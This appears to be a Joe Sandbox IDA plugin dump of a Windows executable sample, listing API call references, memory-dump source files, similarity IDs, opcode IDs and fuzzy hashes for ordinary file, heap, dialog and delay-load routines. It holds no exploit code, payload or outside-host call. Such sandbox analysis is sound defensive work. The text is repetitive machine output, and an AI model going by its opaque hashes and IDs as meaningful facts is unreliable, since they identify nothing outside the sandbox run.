                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E51F
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<Y
                                                                                                                    • API String ID: 1269201914-326072144
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E51F
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<Y
                                                                                                                    • API String ID: 1269201914-326072144
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E580
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: FjunY
                                                                                                                    • API String ID: 1269201914-3672361588
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E580
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: FjunY
                                                                                                                    • API String ID: 1269201914-3672361588
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E580
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: FjunY
                                                                                                                    • API String ID: 1269201914-3672361588
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 21c2bf084d7c12c91fbbbfa028b827b73c328d277b9c3f41f46bec50358686a8
                                                                                                                    • Instruction ID: e712ceb37a3faba025d6bb1100d408cbb7dac4fcff19441cb9dbcf2cb97591d4
                                                                                                                    • Opcode Fuzzy Hash: 21c2bf084d7c12c91fbbbfa028b827b73c328d277b9c3f41f46bec50358686a8
                                                                                                                    • Instruction Fuzzy Hash: 07A001E62A9543BC3928A2926D1BD7B0E1DE4C6B61330896EF856C84C1AC9078866875
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 47232c3acbd94402fcef1d851438c8cbd25aec312d5212c146e64f4aad9211f1
                                                                                                                    • Instruction ID: e712ceb37a3faba025d6bb1100d408cbb7dac4fcff19441cb9dbcf2cb97591d4
                                                                                                                    • Opcode Fuzzy Hash: 47232c3acbd94402fcef1d851438c8cbd25aec312d5212c146e64f4aad9211f1
                                                                                                                    • Instruction Fuzzy Hash: 07A001E62A9543BC3928A2926D1BD7B0E1DE4C6B61330896EF856C84C1AC9078866875
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E51F
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<Y
                                                                                                                    • API String ID: 1269201914-326072144
                                                                                                                    • Opcode ID: bd7355a510e09fad1f8772c23d4050751db93eb6a134e88ce84e590b0be0282e
                                                                                                                    • Instruction ID: 7148deaaadde51f3fa1de7d0ed50541b0579db28bf33bb3d697e160c751629c4
                                                                                                                    • Opcode Fuzzy Hash: bd7355a510e09fad1f8772c23d4050751db93eb6a134e88ce84e590b0be0282e
                                                                                                                    • Instruction Fuzzy Hash: FBA011E22A8002BC3808A2882E0BCBF0E0CE0C2F20330882EF80280080BC802C020830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E580
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: FjunY
                                                                                                                    • API String ID: 1269201914-3672361588
                                                                                                                    • Opcode ID: b617694fd7cd75f11cec9017db71ddafc482f61d637da314e90905827d41d135
                                                                                                                    • Instruction ID: d48ac6ffab10e04a1b0410c61c632ea60bd066958cc019da37201cdbb59cd234
                                                                                                                    • Opcode Fuzzy Hash: b617694fd7cd75f11cec9017db71ddafc482f61d637da314e90905827d41d135
                                                                                                                    • Instruction Fuzzy Hash: 3AA011E22A80023C3808E2A02C0BC3B0E0CE0C0B223328A2EF800800C0BC8028020830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E51F
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<Y
                                                                                                                    • API String ID: 1269201914-326072144
                                                                                                                    • Opcode ID: 1ea0a7625781dcffc400369102c54f3f06e709f6fcb57e5e3044262866a610a9
                                                                                                                    • Instruction ID: 7148deaaadde51f3fa1de7d0ed50541b0579db28bf33bb3d697e160c751629c4
                                                                                                                    • Opcode Fuzzy Hash: 1ea0a7625781dcffc400369102c54f3f06e709f6fcb57e5e3044262866a610a9
                                                                                                                    • Instruction Fuzzy Hash: FBA011E22A8002BC3808A2882E0BCBF0E0CE0C2F20330882EF80280080BC802C020830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E580
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: FjunY
                                                                                                                    • API String ID: 1269201914-3672361588
                                                                                                                    • Opcode ID: d13b74bd8d6b4d3bf9895aef9dd52cc7db26f9178d7f112156fe897eab731316
                                                                                                                    • Instruction ID: 67d5f2b1e82ca124fdbd42fa22b54c1ea1157126b302d4807e8bb6dd65800860
                                                                                                                    • Opcode Fuzzy Hash: d13b74bd8d6b4d3bf9895aef9dd52cc7db26f9178d7f112156fe897eab731316
                                                                                                                    • Instruction Fuzzy Hash: C8A011E22A8002BC3808E2A02C0BC3B0E0CE0C0B20332882EF802800C0BC8028020830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E580
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: FjunY
                                                                                                                    • API String ID: 1269201914-3672361588
                                                                                                                    • Opcode ID: cc54e381d863c80468b937b351faf3c5dc4108c5f21b3d27e42571182a86ca5a
                                                                                                                    • Instruction ID: 67d5f2b1e82ca124fdbd42fa22b54c1ea1157126b302d4807e8bb6dd65800860
                                                                                                                    • Opcode Fuzzy Hash: cc54e381d863c80468b937b351faf3c5dc4108c5f21b3d27e42571182a86ca5a
                                                                                                                    • Instruction Fuzzy Hash: C8A011E22A8002BC3808E2A02C0BC3B0E0CE0C0B20332882EF802800C0BC8028020830
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 005AB7BB: GetOEMCP.KERNEL32(00000000,?,?,005ABA44,?), ref: 005AB7E6
                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,005ABA89,?,00000000), ref: 005ABC64
                                                                                                                    • GetCPInfo.KERNEL32(00000000,005ABA89,?,?,?,005ABA89,?,00000000), ref: 005ABC77
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 546120528-0
                                                                                                                    • Opcode ID: 315e5cedf2a5357defa3f6d80b949ccbec7138f5ca9acaf1d4a87d9519ee57ca
                                                                                                                    • Instruction ID: d4e403970e6b8161a831bed1d025fb4467442f97b6b27eb0b09521f3409a0ff6
                                                                                                                    • Opcode Fuzzy Hash: 315e5cedf2a5357defa3f6d80b949ccbec7138f5ca9acaf1d4a87d9519ee57ca
                                                                                                                    • Instruction Fuzzy Hash: 0F5100709002469EEB209F75C896BBEBFE5FF43310F18446ED4968B253DB39A9458BD0
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00589A50,?,?,00000000,?,?,00588CBC,?), ref: 00589BAB
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00588411,-00009570,00000000,000007F3), ref: 00589BB6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2976181284-0
                                                                                                                    • Opcode ID: cffbfe392601d60103f15eac406e31eae565b402fd5cd1f71f7d8797171975aa
                                                                                                                    • Instruction ID: 072fca704f5d5cb95acd143fbb38d58c0e4573f7412ece98551689e68afc0761
                                                                                                                    • Opcode Fuzzy Hash: cffbfe392601d60103f15eac406e31eae565b402fd5cd1f71f7d8797171975aa
                                                                                                                    • Instruction Fuzzy Hash: A841AB306083428BDB24AF15E58447ABBE5FBD4322F188A2DEC81A3261E770AD448B91
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00581E55
                                                                                                                      • Part of subcall function 00583BBA: __EH_prolog.LIBCMT ref: 00583BBF
                                                                                                                    • _wcslen.LIBCMT ref: 00581EFD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2838827086-0
                                                                                                                    • Opcode ID: 2bbb85995aac0bfcef9a20ffabc37805df503b728d53855cfb245e3d0b63a1db
                                                                                                                    • Instruction ID: 3ed5cd4814c8cb7752dd891b7ba96e70ba26bdeb729dec1d333ce0f3062fb2c3
                                                                                                                    • Opcode Fuzzy Hash: 2bbb85995aac0bfcef9a20ffabc37805df503b728d53855cfb245e3d0b63a1db
                                                                                                                    • Instruction Fuzzy Hash: 6631187190460AAACF15EF98C949AEEBFFABF58300F1004A9F845B7251CB365E11CB64
                                                                                                                    APIs
                                                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,005873BC,?,?,?,00000000), ref: 00589DBC
                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00589E70
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: File$BuffersFlushTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1392018926-0
                                                                                                                    • Opcode ID: 10d035a9e42cca8ad2aad4bc6c6f912a9e7740040114d7b13e4894aa71eeeadf
                                                                                                                    • Instruction ID: d9d1d20808b2a8f6c050c3eff9ba3278cc14e0670a5c34cb54907c4781f26eee
                                                                                                                    • Opcode Fuzzy Hash: 10d035a9e42cca8ad2aad4bc6c6f912a9e7740040114d7b13e4894aa71eeeadf
                                                                                                                    • Instruction Fuzzy Hash: 9021F031249246EBC714EF34C895ABBBFE8BF91304F08491CF8C597141D329E90D9BA1
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00589F27,?,?,0058771A), ref: 005896E6
                                                                                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00589F27,?,?,0058771A), ref: 00589716
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00589EC7
                                                                                                                    • GetLastError.KERNEL32 ref: 00589ED4
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2976181284-0
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 005A8E75
                                                                                                                      • Part of subcall function 005A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005ACA2C,00000000,?,005A6CBE,?,00000008,?,005A91E0,?,?,?), ref: 005A8E38
                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,005C1098,005817CE,?,?,00000007,?,?,?,005813D6,?,00000000), ref: 005A8EB1
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2447670028-0
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 005910AB
                                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 005910B2
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1231390398-0
                                                                                                                    APIs
                                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0058A325,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A501
                                                                                                                      • Part of subcall function 0058BB03: _wcslen.LIBCMT ref: 0058BB27
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0058A325,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A532
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2673547680-0
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,0058977F,?,?,005895CF,?,?,?,?,?,005B2641,000000FF), ref: 0058A1F1
                                                                                                                      • Part of subcall function 0058BB03: _wcslen.LIBCMT ref: 0058BB27
                                                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0058977F,?,?,005895CF,?,?,?,?,?,005B2641), ref: 0058A21F
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2643169976-0
                                                                                                                    APIs
                                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,005B2641,000000FF), ref: 0059ACB0
                                                                                                                    • CoUninitialize.COMBASE(?,?,?,?,005B2641,000000FF), ref: 0059ACB5
                                                                                                                    Similarity
                                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3856339756-0
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,0058A23A,?,0058755C,?,?,?,?), ref: 0058A254
                                                                                                                      • Part of subcall function 0058BB03: _wcslen.LIBCMT ref: 0058BB27
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0058A23A,?,0058755C,?,?,?,?), ref: 0058A280
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2673547680-0
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 0059DEEC
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 0059DF03
                                                                                                                      • Part of subcall function 0059B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0059B579
                                                                                                                      • Part of subcall function 0059B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0059B58A
                                                                                                                      • Part of subcall function 0059B568: IsDialogMessageW.USER32(00010448,?), ref: 0059B59E
                                                                                                                      • Part of subcall function 0059B568: TranslateMessage.USER32(?), ref: 0059B5AC
                                                                                                                      • Part of subcall function 0059B568: DispatchMessageW.USER32(?), ref: 0059B5B6
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2718869927-0
                                                                                                                    • Opcode ID: d5534d0a017b73903d000f1e7e151dbda5151a85ffc000174695086aadf0514f
                                                                                                                    • Instruction ID: 123d2559bcacdeb6843ea0279d69ac568683b0902f9629b1b638224576f116d8
                                                                                                                    • Opcode Fuzzy Hash: d5534d0a017b73903d000f1e7e151dbda5151a85ffc000174695086aadf0514f
                                                                                                                    • Instruction Fuzzy Hash: 27E09B714042496ADF01B761DC0FFAF3F6C6B15789F040451B640EB0A2E974DA149761
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00590836
                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0058F2D8,Crypt32.dll,00000000,0058F35C,?,?,0058F33E,?,?,?), ref: 00590858
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1175261203-0
                                                                                                                    • Opcode ID: bbeef786a2bcf2f86549ccbcae599b07364f2ceab0932609da6e2f2487d52420
                                                                                                                    • Instruction ID: eea187223c327a06bbde99803aeb9f10d686221b366d0de98011b7ffa821e834
                                                                                                                    • Opcode Fuzzy Hash: bbeef786a2bcf2f86549ccbcae599b07364f2ceab0932609da6e2f2487d52420
                                                                                                                    • Instruction Fuzzy Hash: 3AE09272401118AADF00A7909C0DFDA7BACFF09381F0400657644E2004DA74EA848BA0
                                                                                                                    APIs
                                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0059A3DA
                                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0059A3E1
                                                                                                                    Similarity
                                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1918208029-0
                                                                                                                    • Opcode ID: 6f7bf54320af110d2aed6afe7b73cdd4f00a1ac998f8e1ad357395342e038858
                                                                                                                    • Instruction ID: da47d6a418f94d1e0d4bf1771a67f4571a727b3f57c3b03f7baf532ea547e11c
                                                                                                                    • Opcode Fuzzy Hash: 6f7bf54320af110d2aed6afe7b73cdd4f00a1ac998f8e1ad357395342e038858
                                                                                                                    • Instruction Fuzzy Hash: 70E0ED71500218EBCF10DF55C945799BFE8FB04360F20C45AE84693201E774AE04DBA1
                                                                                                                    APIs
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005A2BAA
                                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 005A2BB5
                                                                                                                    Similarity
                                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1660781231-0
                                                                                                                    • Opcode ID: 767cad2add9da423d5e5ed3d27e5776c96af7b87a40220e43e6667bef454f908
                                                                                                                    • Instruction ID: de9656b0d8edf0fb8f70b4905955dee368cebcda87f22c10817ea1f37fd2359b
                                                                                                                    • Opcode Fuzzy Hash: 767cad2add9da423d5e5ed3d27e5776c96af7b87a40220e43e6667bef454f908
                                                                                                                    • Instruction Fuzzy Hash: 42D0A93429420A5A4E182A7D390F58C2F49BD93BB8FA0868AF421D58C1EE509040A131
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3351165006-0
                                                                                                                    • Opcode ID: d41481d7d649edb8d261232570e054cf7dcc5971d3ae759bbf4dee799087f5d3
